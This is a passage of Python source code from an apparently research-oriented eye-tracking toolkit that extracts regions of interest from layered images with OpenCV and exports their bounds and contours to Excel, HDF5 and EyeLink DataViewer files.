'#067E8B','#76A502','#0AD8AB','#EAF3BF','#D479FE','#3B62CD','#789BDD','#7F141E','#949CBE']
self.rgb = [(102,12,15),(153,3,8),(179,47,45),(229,28,35),(242,216,167),(255,255,153),(255,255,77),(242,132,68),(242,141,119),
(150,217,184),(85,217,153),(16,187,111),(54,140,98),(96,154,191),(64,112,160),(33,150,243),(43,71,171),(165,140,255),
(217,35,237),(97,18,179)]
#----shape
# check if trying to do complex ROI using dataviewer
if (self.shape in ['polygon', 'hull']) and (self.roi_format == "dataviewer"):
raise Exception ("Cannot use shape %s when exporting for DataViewer. \
Please use either 'circle', 'rotate', or 'straight' instead, or set roi_format == 'raw'."%(shape))
#----directory
self.filetype = filetype.strip('.')
if self.isDemo is True:
self.image_path = "%s/dist/roi/raw/1/"%(self.path)
self.output_path = "%s/dist/roi/output/"%(self.path)
metadata_source = "%s/dist/roi/raw/1/metadata.xlsx"%(self.path)
else:
self.image_path = image_path
self.output_path = output_path
# if no image path and not demo
if self.image_path is None:
error = "No valid image path found. Please make sure to include an image path. If you wish to run a demo, please set isDemo=True."
raise Exception(error)
else:
# set directory of files
self.directory = [x for x in (Path(self.image_path).glob("*.%s"%(filetype.lower())) or Path(self.image_path).glob("*.%s"%(filetype.upper())))]
## if no files in directory, raise exception
if not self.directory:
error = "No %s images in path: %s. Please make sure to include an image path. \
If you wish to run a demo, please set isDemo=True."%(filetype, self.image_path)
raise Exception(error.replace("\t",""))
#----read metadata file (if metadata is not None)
if metadata_source is not "embedded":
self.metadata_source = metadata_source
_type = Path(self.metadata_source).suffix
if _type == ".csv": self.metadata_all = pd.read_csv(self.metadata_source)
elif _type == ".xlsx": self.metadata_all = pd.read_excel(self.metadata_source)
# convert to string
self.metadata_all = self.metadata_all.astype(str)
# check if metadata is empty
if self.metadata_all.empty:
raise Exception('No data for file: %s'%(self.metadata_source))
@classmethod
def extract_metadata(cls, imagename, imgtype, layer):
"""Extract metadata for each region of interest.
Parameters
----------
imagename : [type]
[description]
imgtype : [type]
[description]
layer : [type]
[description]
Returns
-------
[type]
[description]
[type]
[description]
"""
#----prepare metadata
# if metadata is stored in image files directly
if cls.metadata_source == 'embedded':
metadata = pd.DataFrame(data=(item.split("=") for item in layer.name.split(cls.delimiter)),columns=['key','value'])
metadata.set_index('key', inplace=True)
metadata.loc['name']['value'] = metadata.loc['name']['value'].replace("roi","")
roiname = metadata.loc['name']['value']
# else read metadata from file
else:
# get metadata
if imgtype=='psd':
roiname = layer.name.strip(' \t\n\r') # strip whitespace
metadata = cls.metadata_all.loc[(cls.metadata_all['image'] == imagename) & (cls.metadata_all['roi'] == roiname)]
else:
roiname = imagename
##!!! TODO: Resolve metadata for non-layered images
metadata = cls.metadata_all.loc[(cls.metadata_all['image'] == imagename)]
# if datafame empty
if metadata.empty:
message = 'No data for %s:%s (image:roi).'%(imagename, roiname)
raise Exception(message)
# print results
if cls.isDebug:
cls.console('## roiname: %s'%(roiname),'green')
return metadata, roiname
@classmethod
def format_image(cls, image=None, imgtype='psd', isRaw=False, isPreprocessed=False, isNormal=False, isHaar=False):
"""Resize image and reposition image, relative to screensize.
Parameters
----------
IMG : :obj:`None` or
Can be either:
`psd_tools.PSDImage <https://psd-tools.readthedocs.io/en/latest/reference/psd_tools.html#psd_tools.PSDImage>`__
Photoshop PSD/PSB file object. The file should include one layer for each region of interest, by default None
imgtype : :obj:`str` {'psd','dcm','tiff', 'bitmap'}
Image type.
isRaw : :obj:`None` or ###, optional
If **True**, the image will be returned without resizing or placed on top of a background image. Default is **False**.
isPreprocessed : :obj:`None` or ###, optional
If **True**, the image will be returned with resizing and placed on top of a background image. Default is **False**.
Attributes
----------
image : :class:`PIL.Image.Image`
PIL image object class.
Returns
-------
image, background : :class:`PIL.Image.Image`
PIL image object class.
"""
## load image from PSD, DICOM, tiff, or bitmap as PIL
if imgtype == 'psd':
if not isHaar: image = image.topil()
else: image = image
imagesize = [image.size[0], image.size[1]]
elif imgtype == 'DICOM':
image = image
imagesize = [image.size[0], image.size[1]]
elif imgtype == 'tiff':
image = image
imagesize = [image.size[0], image.size[1]]
elif imgtype == 'bitmap':
image = image
imagesize = [image.size[0], image.size[1]]
# if returning raw image
if isRaw:
if cls.isDebug: cls.console('# export raw image','blue')
return image, imagesize
# if returning raw image
elif isPreprocessed:
## set background
screen_size = cls.screensize
background = Image.new("RGBA", (screen_size), (110, 110, 110, 255))
if cls.isDebug: cls.console('# export preprocessed image','blue')
elif isNormal:
## set background
screen_size = cls.screensize
background = Image.new("RGBA", (screen_size), (0, 0, 0, 0))
if cls.isDebug: cls.console('# export roi image','blue')
# scale and move image to emulate stimulus presentation
if isPreprocessed or isNormal:
# if scale image
if cls.scale != 1:
old_imagesize = [image.size[0], image.size[1]]
imagesize = [int(image.size[0] * cls.scale), int(image.size[1] * cls.scale)]
image = image.resize(tuple(imagesize))
if cls.isDebug:
cls.console('image size: %s, scaled to: %s'%(old_imagesize, imagesize))
# else unscaled
else:
imagesize = [int(image.size[0]), int(image.size[1])]
if cls.isDebug: cls.console('image size: %s'%(imagesize))
# if offsetting
if cls.newoffset:
offset_center = cls.recenter
# calculate upper-left coordinate for drawing into image
x = ((offset_center[0]) - (imagesize[0]/2)) # x-bound <offset_x center> - <1/2 image_x width>
y = (offset_center[1]) - (imagesize[1]/2) # y-bound <offset_y center> - <1/2 image_y width>
left_xy = (int(x),int(y))
if cls.isDebug: cls.console('image centered at: %s'%(offset_center))
# else not offsetting
else:
# calculate upper-left coordinate for drawing into image
x = (screen_size[0]/2) - (imagesize[0]/2) # x-bound <screen_x center> - <1/2 image_x width>
y = (screen_size[1]/2) - (imagesize[1]/2) # y-bound <screen_y center> - <1/2 image_y width>
left_xy = (int(x),int(y))
if cls.isDebug: cls.console('image centered at: %s'%([screen_size[0]/2,screen_size[1]/2]))
# draw
background.paste(image, left_xy)
return background, imagesize
@classmethod
def extract_contours(cls, image, imagename, roiname):
"""[summary]
Parameters
----------
image : [type]
[description]
imagename : [type]
[description]
roiname : [type]
[description]
Returns
-------
[type]
[description]
Raises
------
Exception
[description]
Exception
[description]
"""
def store(image, colors):
# post: prepare for export
img = Image.fromarray(image)
img = img.convert("RGBA")
pixdata = img.load() # allow PIL processing
width, height = img.size
color = random.choice(cls.rgb) # apply color to ROI
# store shape
for y in range(height):
for x in range(width):
# convert background to transparent
if pixdata[x, y] == (255, 255, 255, 255):
pixdata[x, y] = (255, 255, 255, 0)
# convert forground to color
elif pixdata[x, y] == (0, 0, 0, 255):
pixdata[x, y] = color
# store coordinates for ROI export (ias, xlsx)
coord.append([x,y])
# close editing PIL image
#img.close()
return coord, img
# convert pil image to grayscale (using PIL)
#image = image.convert(mode='L')
#imagesize = [image.size[0], image.size[1]]
## convert to np.array
#image = np.array(image)# image.shape: height x width x channel
# or convert pil image to grayscale (using cv2)
# paste image to white background, convert to RGB
size = image.size
image.load()
image_RGB = Image.new("RGB", size=size, color=(255, 255, 255))
image_RGB.paste(image, mask=image.split()[3])
## invert image
image_invert = ImageOps.invert(image_RGB)
## convert to numpy
image_np = np.array(image_invert)
## convert to greyscale
image_gray = cv2.cvtColor(image_np, cv2.COLOR_BGR2GRAY)
# if drawing in PSD files
if cls.isDebug: cls.console('manual ROI detection','blue')
# threshold the image
## note: if any pixels that have value higher than 127, assign it to 255. convert to bw for countour and store original
_retval, threshold = cv2.threshold(src=image_gray, thresh=1, maxval=255, type=0)
# find contours in image
## note: if you only want to retrieve the most external contour # use cv.RETR_EXTERNAL
contours, _hierarchy = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# if contours empty raise Exception
if not bool(contours):
_err = [imagename, roiname, 'Not able to identify contours']
message = '%s; %s; %s'%(_err[0],_err[1],_err[2])
raise Exception(message)
#------------------------------------------------------------------------for each layer: save images and contours
#when saving the contours below, only one drawContours function from above can be run
#any other drawContours function will overlay on the others if multiple functions are run
#----param
s_color = [(91,150,190,255), (247,222,168,255), (33,150,243,255), (229,28,35,255)]
image_blank = np.full_like(image_gray, 255) ## Return an array of x with the same shape and type as a given array.
coord = [] #store shape of each contour: approx polygon, circle, etc.
#breakpoint()
#----straight bounding box
if cls.shape == 'straight':
# cls.console('## roishape: straight bounding box','green')
cls.shape_d = 'RECTANGLE' # dataviewer shape
# contour
cnt = contours[0]
# get bounds
_x,_y,_w,_h = cv2.boundingRect(cnt)
# convert all coordinates floating point values to int
roi_bounds = np.int0(cv2.boxPoints(cv2.minAreaRect(cnt)))
# draw an individual contour
cv2.rectangle(img=image_blank, pt1=(_x,_y), pt2=(_x+_w,_y+_h), color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = roi_bounds
# create contours
_contours = image_contours
#----rotated bounding box
elif cls.shape == 'rotated':
# cls.console('## roishape: rotated bounding box','green')
cls.shape_d = 'FREEHAND' # dataviewer shape
# contour
cnt = contours[0]
# get bounds
rect = cv2.minAreaRect(cnt)
roi_bounds = cv2.boxPoints(rect)
# convert all coordinates floating point values to int
roi_bounds = np.int0(roi_bounds)
# draw an individual contour
cv2.drawContours(image=image_blank, contours=[roi_bounds], contourIdx=-1, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = roi_bounds
# create contours
_contours = image_contours
#----circle enclosing
elif cls.shape == 'circle':
# cls.console('## roishape: bounding circle','green')
cls.shape_d = 'ELLIPSE' # dataviewer shape
# contour
cnt = contours[0]
# get minimal enclosing circle
(_x,_y),_r = cv2.minEnclosingCircle(cnt)
# convert all coordinates floating point values to int
roi_bounds = np.int0(cv2.boxPoints(cv2.minAreaRect(cnt)))
# get center and radius of circle
center = (int(_x),int(_y))
radius = int(_r)
# draw an individual contour
cv2.circle(img=image_blank, center=center, radius=radius, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = roi_bounds
# create contours
_contours = image_contours
#----Contour Approximation
elif cls.shape == 'polygon':
# cls.console('## roishape: approximate polygon','green')
cls.shape_d = 'FREEHAND' # dataviewer shape
# contour
cnt = contours[0]
_epsilon = 0.01 * cv2.arcLength(cnt, True)
# get approx polygons
polygon = cv2.approxPolyDP(curve=cnt, epsilon=_epsilon, closed=True)
# draw approx polygons
cv2.drawContours(image=image_blank, contours=[polygon], contourIdx=-1, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = polygon[:,0,:]
# create contours
_contours = image_contours
#----convex hull
elif cls.shape == 'hull':
# cls.console('## roishape: hull','green')
cls.shape_d = 'FREEHAND' # dataviewer shape
# contour
cnt = contours[0]
# get convex hull
hull = cv2.convexHull(cnt)
# draw hull
cv2.drawContours(image=image_blank, contours=[hull], contourIdx=-1, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = hull[:,0,:]
# create contours
_contours = image_contours
#----no shape chosen
else:
raise Exception('Please select either straight, rotated, circle, polygon, box, or hull shape.')
#cls.console('test4.6', 'red')
return _bounds, _contours, coord
@classmethod
def format_contours(cls, imagename, metadata, roiname, roinumber, bounds, coords):
"""[summary]
Parameters
----------
imagename : [type]
[description]
metadata : [type]
[description]
roiname : [type]
[description]
roinumber : [type]
[description]
roilabel : [type]
[description]
bounds_ : [type]
[description]
contours_ : [type]
[description]
Returns
-------
[type]
[description]
[type]
[description]
Raises
------
Exception
[description]
"""
# contour bounds
## store bounds as df
bounds_ = pd.DataFrame(bounds)
## transpose bounds (x0, y0, x1, y1)
x_ = bounds_[0].unique().tolist()
y_ = bounds_[1].unique().tolist()
## check if bounding box has two x and y coordinate pairs
if (((len(x_) == 1) or (len(y_) == 1)) and cls.shape == 'straight'):
raise Exception ("Error creating bounding box for image:roi %s:%s."%(imagename, roiname))
## set as df
bounds = pd.DataFrame(np.column_stack([x_[0],y_[0],x_[1],y_[1]]))
## rename
bounds.columns = ['x0','y0','x1','y1']
## add index, image, roi, and shape
bounds['image'] = imagename
bounds['roi'] = roiname
bounds['id'] = roinumber
bounds['shape_d'] = cls.shape_d
## convert to int
bounds[['x0','y0','x1','y1']] = bounds[['x0','y0','x1','y1']].astype(int)
#contour coords
coords = pd.DataFrame(coords, columns = ['x','y'])
coords[['image','roi','shape']] = pd.DataFrame([[imagename, roiname, cls.shape]], index=coords.index)
#----save roi df
# combine metadata with bounds
if metadata is not None:
bounds = pd.merge(bounds, metadata, on=['image','roi'], how='outer')
# finish
return bounds, coords
@classmethod
def draw_contours(cls, filepath, img=None):
"""[summary]
Parameters
----------
filepath : [type]
[description]
data : [type]
[description]
fig : [type]
[description]
source : str, optional
[description], by default 'bounds'
"""
# convert pil to np
img_np = np.array(img)
plt.imshow(img_np)
## check folder
filepath_ = Path(filepath).parent
if not os.path.exists(filepath_):
os.makedirs(filepath_)
## save
if cls.isDebug: cls.console('## image saved @: %s'%(filepath),'blue')
@classmethod
def export_data(cls, df, path, filename, uuid=None, newcolumn=None, level='image'):
"""[summary]
Parameters
----------
df : [type]
Bounds.
path : [type]
[description]
filename : [type]
[description]
uuid : [type], optional
[description], by default None
newcolumn : [type], optional
[description], by default None
nested : :obj:`string` {`image`,`all`}
Nested order, either **image** or **all**. Default is **image**.
Returns
-------
[type]
[description]
"""
#if workng with a single image
if level == 'image':
# if new column is not None and level == image
if (isinstance(newcolumn, (dict,))):
df[list(newcolumn.keys())[0]] = list(newcolumn.values())[0]
# if uuid, create a unique column
if isinstance(uuid, (list,)):
df['uuid'] = df[uuid].apply(lambda x: ''.join(x), axis=1)
uuid_column = 'uuid'
# else simply use roiname
else:
uuid_column = cls.roicolumn
#else if workng with all images
elif level == 'all':
# if uuid, create a unique column
if isinstance(uuid, (list,)):
uuid_column = 'uuid'
# else simply use roiname
else:
uuid_column = cls.roicolumn
# check if folder exists
if not os.path.exists(path):
os.makedirs(path)
# export to excel
if ((cls.roi_format == 'raw') or (cls.roi_format == 'both')):
#if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.xlsx"%(path, filename, cls.append_output_name))
else:
filepath = Path("%s/%s.xlsx"%(path, filename))
#save
df.to_excel("%s"%(filepath), index=False)
# if debug
if cls.isDebug: cls.console("## raw data saved @: %s"%(filepath),'green')
# export to ias (dataviewer)
if ((cls.roi_format == 'dataviewer') or (cls.roi_format == 'both')):
#if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.ias"%(path, filename, cls.append_output_name))
else:
filepath = Path("%s/%s.ias"%(path, filename))
_bounds = '\n'.join(map(str, [
"# EyeLink Interest Area Set created on %s."%(cls.now()),
"# Interest area set file using imhr.eyetracking.ROI()",
"# columns: RECTANGLE | IA number | x0 | y0 | x1 | y1 | label",
"# example: RECTANGLE 1 350 172 627 286 leftcheek",
"# columns: ELLIPSE | IA number | x0 | y0 | x1 | y1 | label",
"# example: ELLIPSE 2 350 172 627 286 leftcheek",
"# columns: FREEHAND | IA number | x0,y0 | x1,y1 | x2,y2 | x3,y3 | label",
"# example: FREEHAND 3 350,172 627,172 627,286 350,286 leftcheek",
"# For more information see Section 5.10.1 of Eyelink DataViewer Users Manual (3.2.1).",
df[['shape_d','id','x0','y0','x1','y1',uuid_column]].to_csv(index=False, header=False).replace(',', ' ')
]))
# save to ias
with open("%s"%(filepath), "w") as file:
file.write(_bounds)
# if debug
if cls.isDebug: cls.console("## dataviewer data saved @: %s"%(filepath),'green')
return df
@classmethod
def manual_detection(cls, directory, core=0, queue=None):
"""[summary]
Parameters
----------
directory : :obj:`list`
[description]
core : :obj:`int`
(if isMultiprocessing) Core used for this function. Default is **0**.
queue : :obj:`queue.Queue`
Constructor for a multiprocessing 'first-in, first-out' queue. Note: Queues are thread and process safe.
Returns
-------
[type]
[description]
"""
#----prepare lists for all images
l_bounds_all = []
l_contours_all = []
l_coords_all = []
l_error = []
#!!!----for each image
cls.console('starting()','purple')
if cls.isDebug: cls.console('for each image','purple')
for file in directory:
# console
if cls.isDebug and cls.isMultiprocessing: cls.console('core: %s'%(core),'orange')
# defaults
imgtype='psd'
# read image
ext = (Path(file).suffix).lower()
## if psd
if ext == '.psd':
imgtype = 'psd'
layered_image = psd_tools.PSDImage.open(file)
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if DICOM (GIMP)
##!!! TODO: get working
elif ext == '.dcm':
breakpoint()
imgtype = 'DICOM'
layered_image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
else:
error = "Image format not valid. Acceptable image formats are: psd (Photoshop) or dcm (DICOM)."
raise Exception(error)
# clear lists
l_bounds = [] #list of bounds (data)
l_contours = [] #list of contours (image)
l_coords = [] #list of coordinates (data)
#!!!----for each image, save image file
# raw image
image, imagesize = cls.format_image(image=layered_image, imgtype=imgtype, isRaw=True)
## check folder
_folder = '%s/img/raw/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches is not None: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# preprocessed imaage (image with relevant screensize and position)
image, imagesize = cls.format_image(image=layered_image, imgtype=imgtype, isPreprocessed=True)
## check folder
_folder = '%s/img/preprocessed/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches is not None: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
#!!!----for each region of interest
## counter
roinumber = 1
## check path
_folderpath = '%s/img/bounds/roi/'%(cls.output_path)
if not os.path.exists(_folderpath):
os.makedirs(_folderpath)
## for each layer in psd (if using psd)
#!!! TODO: get working for other image types (DICOM)
for layer in layered_image:
# skip if layer is main image
if ((imgtype=='psd') and (Path(layer.name).stem == imagename)):
continue
else:
#. Extract metadata for each region of interest.
metadata, roiname = cls.extract_metadata(imagename=imagename, layer=layer, imgtype=imgtype)
#. Resize PIL image and reposition image, relative to screensize.
image, imagesize = cls.format_image(image=layer, imgtype=imgtype, isNormal=True)
#. Extract cv2 bounds, contours, and coordinates from np.array(image).
bounds, contours, coords = cls.extract_contours(image=image, imagename=imagename, roiname=roiname)
#. Format contours as Dataframe, for exporting to xlsx or ias.
bounds, coords = cls.format_contours(imagename=imagename, metadata=metadata, roiname=roiname, roinumber=roinumber, bounds=bounds, coords=coords)
#. Draw contours
## if append_output_name
if not (cls.append_output_name is False):
filepath = '%s/img/bounds/roi/%s.%s_%s.png'%(cls.output_path, imagename, roiname, cls.append_output_name)
else:
filepath = '%s/img/bounds/roi/%s.%s.png'%(cls.output_path, imagename, roiname)
## save image
if cls.image_backend == 'PIL':
contours.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches is not None: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
cls.draw_contours(filepath=filepath, img=contours)
plt.title('Region of Interest')
plt.ylabel('Screen Y (pixels)')
plt.xlabel('Screen X (pixels)')
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
#. store processed bounds and contours to combine across image
l_bounds.append(bounds)
l_contours.append(contours)
l_coords.append(coords)
#. update counter
roinumber = roinumber + 1
#!!!----for each image
### if append_output_name
if not (cls.append_output_name is False):
filepath = Path('%s/img/bounds/%s_%s.png'%(cls.output_path, imagename, cls.append_output_name))
else:
filepath = '%s/img/bounds/%s.png'%(cls.output_path, imagename)
## save image
if cls.image_backend == 'PIL':
img_ = Image.new('RGBA', l_contours[0].size)
for c in l_contours:
#img_ = Image.blend(img_, c, 0.125)
img_.paste(c, mask=c)
# add opacity
img_.putalpha(110)
img_.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches is not None: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
[cls.draw_contours(filepath=filepath, img=cnt) for cnt in l_contours]
plt.title('Region of Interest')
plt.ylabel('Screen Y (pixels)')
plt.xlabel('Screen X (pixels)')
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# bounds
## concatenate and store bounds for all rois
df = pd.concat(l_bounds)
l_bounds_all.append(df)
## export data
_filename = "%s_bounds"%(imagename)
_folder = '%s/data/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
df = cls.export_data(df=df, path=_folder, filename=_filename, uuid=cls.uuid, newcolumn=cls.newcolumn, level='image')
# contours
# concatenate and store contours for all rois
df = pd.concat(l_coords)
l_coords_all.append(df)
## export data
_filename = "%s_contours"%(imagename)
_folder = '%s/data/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
filepath = Path("%s/%s.h5"%(_folder, _filename))
df.to_hdf("%s"%(filepath), key='df', format='table', mode='w', data_columns=['image','roi'])
#!!!----finished for all images
# store
## if multiprocessing, store in queue
if cls.isMultiprocessing:
queue.put(l_bounds_all, l_coords_all)
pass
# if not multiprocessing, return
else:
return l_bounds_all, l_contours_all, l_coords_all, l_error
@classmethod
def haarcascade(cls, directory, core=0, queue=None):
"""[summary]
Parameters
----------
directory : [type]
[description]
core : int, optional
[description], by default 0
queue : [type], optional
[description], by default None
Returns
-------
[type]
[description]
Raises
------
Exception
[description]
"""
#!!!----for each image
cls.console('starting()','purple')
if cls.isDebug: cls.console('for each image','purple')
l_coords_all = []
l_error = []
for file in directory:
# console
if cls.isDebug and cls.isMultiprocessing: cls.console('core: %s'%(core),'orange')
# defaults
imgtype='psd'
# read image
ext = (Path(file).suffix).lower()
## if psd
if ext == '.psd':
imgtype = 'psd'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if DICOM (GIMP)
elif ext == '.dcm':
breakpoint()
imgtype = 'DICOM'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if tiff
elif ext in ['.tiff','.tif']:
breakpoint()
imgtype = 'tiff'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if bitmap
elif ext in ['.bmp','.jpeg','.jpg','.png']:
imgtype = 'bitmap'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
else:
error = "Image format not valid. Acceptable image formats are: psd (photoshop), dcm (DICOM), tiff (multiple layers), or png/bmp/jpg (bitmap)."
raise Exception(error)
# clear lists
l_coords = [] #list of coordinates (data)
#!!!----for each image, save image file
# raw image
image, imagesize = cls.format_image(image=image, imgtype=imgtype, isRaw=True, isHaar=True)
## check folder
_folder = '%s/img/raw/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches is not None: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# preprocessed imaage (image with relevant screensize and position)
image, imagesize = cls.format_image(image=image, imgtype=imgtype, isPreprocessed=True, isHaar=True)
## check folder
_folder = '%s/img/preprocessed/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches is not None: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# The image is read and converted to grayscale
cv2_image = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
gray = np.array(image.convert("L"))#; cv2.imwrite(greypath, gray)
# for each requested classifier
for ctype in cls.classifiers:
classifier = cls.classifiers[ctype]
## parameters
color = random.choice(cls.rgb)
cregion = classifier['type']
sF = classifier['scaleFactor']
minN = classifier['minNeighbors']
minS = tuple(classifier['minSize'])
thickness = classifier['thickness']
cpath_ = Path(classifier['path'])
## setup classifier
haar = cv2.CascadeClassifier('%s'%(cpath_))
## detect
roi = haar.detectMultiScale(gray, scaleFactor=sF, minNeighbors=minN, minSize=minS, flags=cv2.CASCADE_SCALE_IMAGE)
for idx, (x, y, w, h) in enumerate(roi):
# store coords
l_coords.append([x, y, x+x+w/2, y+y+h/2, cregion, idx, imagename])
# draw region
cv2.rectangle(img=cv2_image, pt1=(x,y), pt2=(x+w,y+h), color=color, thickness=thickness)
roi_gray = gray[y:y + h, x:x + w]
roi_color = cv2_image[y:y + h, x:x + w]
# save image
_folder = '%s/img/cascades/'%(cls.output_path)
_filepath = '%s/%s.png'%(_folder, imagename)
## check folder
if not os.path.exists(_folder):
os.makedirs(_folder)
## save
cv2.imwrite(_filepath, cv2_image)
# save data
_folder = '%s/data/'%(cls.output_path)
_filepath = '%s/%s_cascades.xlsx'%(_folder, imagename)
## check folder
if not os.path.exists(_folder):
os.makedirs(_folder)
## save
df = pd.DataFrame(l_coords, columns=['x0', 'y0', 'x1', 'y1', 'feature', 'id', 'image'])
df.to_excel(_filepath, index=False)
# store coords
l_coords_all.append(df)
#!!!----finished for all images
# store
## if multiprocessing, store in queue
if cls.isMultiprocessing:
queue.put(l_coords_all)
pass
# if not multiprocessing, return
else:
return l_coords_all, l_error
@classmethod
def process(cls):
"""[summary]
Returns
-------
[type]
[description]
"""
# prepare arguements and procedure
df = ''
# if multiprocessing, get total cores
if cls.isMultiprocessing:
import multiprocessing
#----get number of available cores
_max = multiprocessing.cpu_count() - 1
#---check if selected max or value above possible cores
if (cls.cores == 'max') or (cls.cores >= _max):
cls.cores = _max
else:
cls.cores = cls.cores
#----double check multiproessing
# if requested cores is 0 or 1, run without multiprocessing
if ((cls.cores == 0) or (cls.cores == 1)):
cls.isMultiprocessing = False
cls.console('not multiprocessing', 'purple')
# split directory by number of cores
else:
cls.isMultiprocessing = True
l_directory = np.array_split(cls.directory, cls.cores)
cls.console('multiprocessing with %s cores'%(cls.cores), 'purple')
# not multiprocessing
else:
cls.isMultiprocessing = False
cls.console('not multiprocessing', 'purple')
#----prepare to run
# if not multiprocessing
if not cls.isMultiprocessing:
if cls.detection == "haarcascade":
l_coords_all, _ = cls.haarcascade(cls.directory)
# finish
df, error = cls.finished(df=l_coords_all)
else:
l_bounds_all, _, _, _ = cls.manual_detection(cls.directory)
# finish
df, error = cls.finished(df=l_bounds_all)
# else if multiprocessing
else:
# collect each pipe (this is used to build send and recieve portions of output)
queue = multiprocessing.Queue()
# prepare threads
if cls.detection == "haarcascade":
process = [multiprocessing.Process(target=cls.haarcascade, args=(l_directory[core].tolist(), core, queue,)) for core in range(cls.cores)]
else:
process = [multiprocessing.Process(target=cls.manual_detection, args=(l_directory[core].tolist(), core, queue,)) for core in range(cls.cores)]
# start each thread
for p in process:
p.daemon = True
p.start()
# return pipes
# note: see https://stackoverflow.com/a/45829852
returns = []
for p in process:
returns.append(queue.get())
# wait for each process to finish
for p in process:
p.join()
#----after running
if cls.isDebug: cls.console('process() finished (multiprocessing)','purple')
df, error = cls.finished(returns)
return df, error
@classmethod
def finished(cls, df, errors=None):
"""
Process bounds for all images.
Parameters
----------
df : [type]
[description]
errors : [type], optional
[description], by default None
"""
# if multiprocessing, combine df from each thread
if cls.isMultiprocessing:
#concatenate data
df = [i[0] for i in df if len(i) != 0] #check if lists are empty (i.e. if there are more threads than directories)
df = pd.concat(df)
# else combine lists of df to df
